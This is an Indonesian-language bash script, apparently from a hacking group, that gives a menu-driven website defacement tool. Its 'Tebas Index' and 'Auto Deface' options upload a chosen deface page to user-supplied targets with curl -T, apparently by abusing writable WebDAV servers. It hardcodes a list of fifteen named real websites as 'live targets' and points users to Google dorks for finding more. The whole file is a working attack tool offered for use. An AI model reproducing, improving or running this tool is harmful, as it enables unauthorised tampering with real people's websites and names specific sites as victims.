green="\033[32;1m"
yellow="\033[33;1m"
indigo="\033[34;1m"
red="\033[31;1m"
white="\033[37;1m"
cyan="\033[36;1m"
clear
echo
echo
echo
echo
echo
echo
toilet -f future "    Defacer Tools" | lolcat
echo
echo $white "╭─"$yellow"WELLCOME TO MY TOOLS"$cyan" ~/Masukan Username Anda Di Bawah!!!"$white
read -p " ╰─$ " kontol
clear
echo
echo
echo
echo $red"    Haloo"$green" $kontol"$red" Selamat Datang Di Tools Defacer"
sleep 4
clear
echo
echo
echo
echo
echo
echo $red"##########################$green" WELCOME "$red###########################"
echo $yellow
figlet -f future "Indonesian Cyber Army"
echo
echo $red"##########################$green" WELCOME "$red###########################"
echo
echo $indigo"	~"$cyan"{"$white"01"$cyan"}"$green"."$yellow"Tebas Index"$cyan
echo $indigo"        ~"$cyan"{"$white"02"$cyan"}"$green"."$yellow"Web Scan"$cyan
echo $indigo"	~"$cyan"{"$white"03"$cyan"}"$green"."$yellow"Auto Deface"$cyan
echo $indigo"	~"$cyan"{"$white"04"$cyan"}"$green"."$yellow"Tools Installer"$cyan
echo $indigo"	~"$cyan"{"$white"05"$cyan"}"$green"."$yellow"Bikin Script Deface"$cyan
echo
echo $red"＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿"
echo
echo $indigo"  +"$cyan"{"$white"T"$cyan"}"$white"."$green"TUTORIAL & LIVE TARGET"$indigo"      +"$cyan"{"$white"I"$cyan"}"$green"Info"$indigo"      +"$cyan"{"$white"Q"$cyan"}"$green"Quit"$cyan
echo $red"＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿"
echo $indigo"=============================================================="
echo $white "╭─"$yellow"Chemod@zrd404"$cyan" ~/$kontol"$white
read -p " ╰─$ "  apaan
echo
if [ $apaan = "01" ] || [ $apaan = "1" ]
then
echo
echo
echo
clear
echo
echo
echo
echo
toilet -f future "Deface Tebas Index" | lolcat
echo
echo $red "Simpan SC Di Memory Internal Di Luar Folder "
echo
echo $yellow "Live Target"
echo $white "http://contsol.co.za"
echo $cyan "http://colourfactory.co.za"
echo $white "http://chillibitez.co.za"
echo $cyan "http://chasingfantasia.com"
echo $white "http://centraltech.co.za"
echo $cyan "http://cblandscapes.co.za"
echo $white "http://crimsonmonkeyweb.com"
echo $cyan "http://kevinbutho.com"
echo $white "http://prorepafrica.com"
echo $cyan "http://xposurephotography.co.za"
echo $white "http://windmillsandporcupines.co.za"
echo $cyan "http://tcnig.co.za"
echo $white "http://techdirect.co.za"
echo $cyan "http://thehellenic.co.za"
echo $white "http://valdicare.co.za"
echo
echo "    Masukan Script Deface!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Kalo Mau Tebas Index Namai SC index.html"$white                               
read -p " ╰─$ " script
echo
echo
echo $white"  Masukan Target 1 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Got Hacked!!!"$white
read -p " ╰─$ " target
curl -T /storage/emulated/0/$script $target
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target"
echo
echo
echo $cyan"["$yellow"B"$cyan"]"$white"back "$cyan"["$yellow"Q"$cyan"]"$white"Quit"
read -p "[B/Q] : " back
fi

if [ $apaan = "02" ] || [ $apaan = "2" ]
then
echo
echo
echo
clear
echo
echo
echo
cd Files
php kamu.php
echo
echo $cyan"["$yellow"B"$cyan"]"$white"back "$cyan"["$yellow"Q"$cyan"]"$white"Quit"
read -p "[B/Q] : " back
fi

if [ $apaan = "03" ] || [ $apaan = "3" ]
then
clear
echo
echo
echo
echo $red"##############################################################"
echo
echo $cyan"Note"$white":"$green" Klik CTRL+C Untuk Keluar Jika Tidak Mau melanjutkan Lagi"
echo $yellow"   Dork Sama Seperti Webdav Cari Dork Nya Di Google Banyak!"
echo
echo $red"##############################################################"
echo
toilet -f future "Wellcome to my tools" | lolcat
echo
toilet -f small "$kontol" | lolcat
echo
echo $red"##############################################################"
echo
echo
echo
echo "    Masukan Script Deface!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Kalo Mau Tebas Index Namai SC index.html"$white                               
read -p " ╰─$ " script
echo
echo
echo $white"  Masukan Target 1 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target1
curl -T /storage/emulated/0/$script $target1
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target1"
echo
echo $white"  Masukan Target 2 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target2
curl -T /storage/emulated/0/$script $target2
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target2"
echo
echo $white"  Masukan Target 3 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target3
curl -T /storage/emulated/0/$script $target3
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target3"
echo
echo $white"  Masukan Target 4 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target4
curl -T /storage/emulated/0/$script $target4
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target4"
echo $white"  Masukan Target 5 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target5
curl -T /storage/emulated/0/$script $target5
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target5"
echo
echo $white"  Masukan Target 6 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target6
curl -T /storage/emulated/0/$script $target6
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target6"
echo
echo $white"  Masukan Target 7 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target7
curl -T /storage/emulated/0/$script $target7
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target7"
echo
echo $white"  Masukan Target 8 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target8
curl -T /storage/emulated/0/$script $target8
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target8"
echo
echo $white"  Masukan Target 9 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target9
curl -T /storage/emulated/0/$script $target9
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target9"
echo $white"  Masukan Target 10 !!!!"
echo $white "╭─"$green"Chemod@zrd404"$cyan" ~/Defacer"$white
read -p " ╰─$ " target10
curl -T /storage/emulated/0/$script $target10
echo $cyan"     ["$green"+"$cyan"]"$red"==="$white"＞"$green"$target10"
echo
echo $red"Kalo berhasil ke tebas akses url sperti biasa"
echo $green"Tapi kalo tidak berhasil ke tebas pakai nama SC di belakangnya"
echo $yellow"Contoh: http://target.com/Chemod777.html"
echo
echo $cyan"["$yellow"B"$cyan"]"$white"back "$cyan"["$yellow"Q"$cyan"]"$white"Quit"
read -p "[B/Q] : " back
fi




if [ $apaan = "04" ] || [ $apaan = "4" ]
then
echo
echo
echo
clear
echo
echo
echo
cd Files
sh install
echo
echo $cyan"["$yellow"B"$cyan"]"$white"back "$cyan"["$yellow"Q"$cyan"]"$white"Quit"
read -p "[B/Q] : " back
fi



if [ $apaan = "05" ] || [ $apaan = "5" ]
then
clear
echo
echo
echo
echo
echo
echo
cd Files
python2 create.py
echo
mv -f index.html /storage/emulated/0/
echo
clear
echo
echo $green"Nama SC index.html Cari di memory internal!!!"
echo
echo
echo $cyan"["$yellow"B"$cyan"]"$white"back "$cyan"["$yellow"Q"$cyan"]"$white"Quit"
read -p "[B/Q] : " back
fi



if [ $apaan = "I" ] || [ $apaan = "i" ]
then
echo
echo
echo
clear
echo
echo
echo
echo
toilet -f future "   Informasi Tools" | lolcat
echo $red"##########################$green" WELCOME "$red###########################"
echo $green"Author     "$white":"$cyan" Chemod_zrd404			"
echo $green"Gthub      "$white":"$cyan" https://github.com/21D4N404"
echo $green"Website    "$white":"$cyan" www.indo-cyber.zone.id"
echo
echo $yellow"                          THANKS TO :"
echo
echo $cyan"[+] MR.NAGON_TA7 & KOKO "
echo $cyan"[+] MR.W3B_XIT "
echo $cyan"[+] MR.L3RBI & All Member [I.C.A] "
echo $red"##########################$green" WELCOME "$red###########################"
echo $indigo"＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿"
echo
echo $cyan"["$yellow"B"$cyan"]"$white"back "$cyan"["$yellow"Q"$cyan"]"$white"Quit"
read -p "[B/Q] " back
fi

if [ $apaan = "T" ] || [ $apaan = "t" ]
then
cat tutorial.txt
echo
echo $cyan"["$yellow"B"$cyan"]"$white"back "$cyan"["$yellow"Q"$cyan"]"$white"Quit"
read -p "[B/Q] " back
fi

if [ $apaan = "Q" ] || [ $apaan = "q" ]
then
echo $red " Terimakasih $kontol Sudah Menggunakan Tools Kami :) "
exit
clear
fi


if [ $back = "B" ] || [ $back = "b" ]
then
sh 77
fi

if [ $back = "Q" ] || [ $back = "q" ]
then
echo $red " Terimakasih $kontol Sudah Menggunakan Tools Kami :) "
exit
clear
fi
